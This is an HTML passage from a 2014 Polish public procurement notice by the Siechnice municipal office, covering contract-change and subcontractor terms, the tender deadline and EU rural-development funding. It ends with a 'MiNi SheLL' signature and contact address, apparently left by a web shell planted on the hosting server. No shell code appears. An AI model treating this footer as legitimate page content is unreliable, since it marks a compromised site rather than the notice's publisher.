obowiązujących przepisów prawa lub 3)opóźnień Zamawiającego w przekazaniu Wykonawcy dokumentów,
do których przekazania Zamawiający był zobowiązany, 4)działania siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 5)innych okoliczności nie powstałych z winy Wykonawcy lub 6)opóźnieniem
związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów
lub 7)koniecznością wykonania zamówień dodatkowych Uwaga: Zamawiający dopuszcza zmianę terminu
umowy w sytuacjach, które muszą być udokumentowane przez Wykonawcę w sposób jednoznaczny i nie
budzący wątpliwości. 11.Zamawiający dopuszcza zmianę podwykonawców realizujących poszczególne
części zamówienia w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego)
podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez
podwykonawcę. Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z
podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie
szczegółowo opisanym w istotnych warunkach umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice - kancelaria -
parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany w ramach działania 413 Wdrażanie lokalnych strategii rozwoju
PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com